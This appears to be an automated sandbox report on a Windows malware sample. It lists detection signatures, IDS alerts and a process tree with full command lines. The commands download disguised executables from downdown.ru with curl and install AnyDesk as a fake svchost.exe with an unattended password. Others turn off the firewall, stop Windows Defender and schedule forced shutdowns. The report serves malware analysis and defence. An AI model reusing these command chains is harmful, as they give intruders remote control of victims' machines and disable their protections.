Edit tour
Windows
Analysis Report
eqRHH2whJu.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Allocates memory in foreign processes
Creates files in the system32 config directory
Disables DEP (Data Execution Prevention) for certain images
Disables Windows Defender (via service or powershell)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files with benign system names
Found stalling execution ending in API Sleep call
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global get message hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Group Policy settings
Modifies power options to not sleep / hibernate
Modifies the windows firewall
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses shutdown.exe to shutdown or reboot the system
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64native
- eqRHH2whJu.exe (PID: 7676 cmdline:
"C:\Users\ user\Deskt op\eqRHH2w hJu.exe" MD5: 685F86F41DB34F2EC805449037AA32C9) - AcroRd32.exe (PID: 4656 cmdline:
"C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroR d32.exe" " C:\Intel\ 131.pdf" MD5: 6791EAE6124B58F201B32F1F6C3EC1B0) - cmd.exe (PID: 4100 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>C :\Intel\re zet.cmd cd C:\Intel\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - attrib.exe (PID: 4820 cmdline:
"C:\Window s\System32 \attrib.ex e" +s +h C :\Intel MD5: 0E938DD280E83B1596EC6AA48729C2B0) - conhost.exe (PID: 5924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7468 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd p ing -n 6 1 27.0.0.1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6856 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6772 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\d river.exe http://dow ndown.ru/d river.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 4624 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\b lat.exe ht tp://downd own.ru/bla t.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7604 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 3420 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\s vchost.exe http://do wndown.ru/ svchost.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 2936 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\T rays.rar h ttp://down down.ru/Tr ays.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6112 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\A nyDesk\wol .ps1 http: //downdown .ru/wol.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3628 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7236 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\d c.exe http ://downdow n.ru/dc.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6536 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\dr iver.exe x -r -ep2 - hplimpid29 03392 C:\I ntel\Trays .rar C:\In tel\ /y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7728 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd s tart C:\In tel\Trays\ Trays.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7816 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd s vchost.exe --install C:\Intel\ AnyDesk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6100 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd n etsh advfi rewall set allprofil es state o ff MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 5448 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd s c stop Win Defend MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2252 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 1740 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\A nyDesk\bat .bat http: //downdown .ru/bat.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7476 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\An yDesk\bat. lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7108 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Inte l\rezet.cm d" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - PING.EXE (PID: 7496 cmdline:
ping -n 6 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - curl.exe (PID: 5988 cmdline:
C:\Intel\c url.exe -o C:\Intel\ driver.exe http://do wndown.ru/ driver.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 6112 cmdline:
C:\Intel\c url.exe -o C:\Intel\ blat.exe h ttp://down down.ru/bl at.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 1360 cmdline:
C:\Intel\c url.exe -o C:\Intel\ svchost.ex e http://d owndown.ru /svchost.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 5308 cmdline:
C:\Intel\c url.exe -o C:\Intel\ Trays.rar http://dow ndown.ru/T rays.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 1160 cmdline:
C:\Intel\c url.exe -o C:\Intel\ AnyDesk\wo l.ps1 http ://downdow n.ru/wol.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 5924 cmdline:
C:\Intel\c url.exe -o C:\Intel\ dc.exe htt p://downdo wn.ru/dc.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - driver.exe (PID: 4940 cmdline:
C:\Intel\d river.exe x -r -ep2 -hplimpid2 903392 C:\ Intel\Tray s.rar C:\I ntel\ /y MD5: 29086D9247FDF40452563C11B3DCA394) - Trays.exe (PID: 5512 cmdline:
"C:\Intel\ Trays\Tray s.exe" -tr ay MD5: 90D208B856DEA18596D57FFB1DD3A867) - 4t-min64.exe (PID: 1520 cmdline:
"C:\Intel\ Trays\4t-m in64.exe" "C:\Intel\ Trays\Shel lEh6055x64 .dll" MD5: 7BC3AEEDC18717D796F1C7FF8DBF0C17) - svchost.exe (PID: 7772 cmdline:
svchost.ex e --instal l C:\Intel \AnyDesk MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - svchost.exe (PID: 6516 cmdline:
"C:\Intel\ svchost.ex e" --local -service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - svchost.exe (PID: 6064 cmdline:
"C:\Intel\ svchost.ex e" --local -control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - netsh.exe (PID: 6840 cmdline:
netsh advf irewall se t allprofi les state off MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - sc.exe (PID: 2044 cmdline:
sc stop Wi nDefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - curl.exe (PID: 6988 cmdline:
C:\Intel\c url.exe -o C:\Intel\ AnyDesk\ba t.bat http ://downdow n.ru/bat.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - cmd.exe (PID: 6104 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Inte l\AnyDesk\ bat.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 2056 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho QWERTY1 234566 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - AnyDesk.exe (PID: 6608 cmdline:
AnyDesk.ex e --set-pa ssword _un attended_a ccess MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - dc.exe (PID: 1400 cmdline:
C:\Intel\d c.exe /D MD5: 139464919440E93E49C80CC890B90585) - dc.exe (PID: 6064 cmdline:
"C:\Intel\ dc.exe" /S YS 1 MD5: 139464919440E93E49C80CC890B90585) - powercfg.exe (PID: 1172 cmdline:
powercfg - setacvalue index SCHE ME_CURRENT 4f971e89- eebd-4455- a8de-9e590 40e7347 5c a83367-6e4 5-459f-a27 b-476b1d01 c936 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 1648 cmdline:
powercfg - change -st andby-time out-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 1084 cmdline:
powercfg - change -hi bernate-ti meout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 2868 cmdline:
powercfg - h off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 1820 cmdline:
powercfg / SETDCVALUE INDEX SCHE ME_CURRENT 238c9fa8- 0aad-41ed- 83f4-97be2 42c8f20 bd 3b718a-068 0-4d9d-8ab 2-e1d2b4ac 806d 1 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 1304 cmdline:
powercfg / SETACVALUE INDEX SCHE ME_CURRENT 238c9fa8- 0aad-41ed- 83f4-97be2 42c8f20 bd 3b718a-068 0-4d9d-8ab 2-e1d2b4ac 806d 1 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - schtasks.exe (PID: 720 cmdline:
schtasks / create /tn "Shutdown At5AM" /tr "shutdown /s /f /t 0" /sc dai ly /st 05: 00 MD5: 478BEAEC1C3A9417272BC8964ADD1CEE) - powershell.exe (PID: 4308 cmdline:
Powershell .exe -exec utionpolic y remotesi gned -File C:\Intel\ AnyDesk\wo l.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- AnyDesk.exe (PID: 4776 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 3056 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 6744 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --new-in stall MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - AnyDesk.exe (PID: 2656 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --crash-h andler MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 3108 cmdline:
C:\Windows \system32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s fhsvc MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 5988 cmdline:
C:\Windows \System32\ svchost.ex e -k NetSv cs -p -s N caSvc MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 1004 cmdline:
C:\Windows \system32\ svchost.ex e -k Local SystemNetw orkRestric ted -s WPD BusEnum MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 5308 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s s eclogon MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 3316 cmdline:
C:\Windows \System32\ svchost.ex e -k NetSv cs -p -s N caSvc MD5: F586835082F632DC8D9404D83BC16316)
- shutdown.exe (PID: 8132 cmdline:
C:\Windows \system32\ shutdown.E XE /s /f / t 0 MD5: F2A4E18DA72BB2C5B21076A5DE382A20) - conhost.exe (PID: 7808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- msedge.exe (PID: 2200 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-08T16:18:18.693265+0100 | 2008754 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.11.20 | 49720 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-08T16:18:11.845772+0100 | 2025169 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.11.20 | 49717 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-08T16:18:11.845772+0100 | 2025161 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.11.20 | 49717 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Binary or memory string: | memstr_890212d8-c |
Source: | Static PE information: |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 37_2_00A7CD06 | |
Source: | Code function: | 37_2_00A7FCDD | |
Source: | Code function: | 43_2_0040F8BC | |
Source: | Code function: | 44_2_00407C0E | |
Source: | Code function: | 44_2_0040DB44 | |
Source: | Code function: | 44_2_0040DDDC | |
Source: | Code function: | 45_2_03E34400 | |
Source: | Code function: | 47_2_03E34400 | |
Source: | Code function: | 48_2_03E34400 |
Source: | Code function: | 44_2_00407D0E |
Source: | Code function: | 46_2_00418560 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network Connect: |
Source: | Image file has PE prefix: |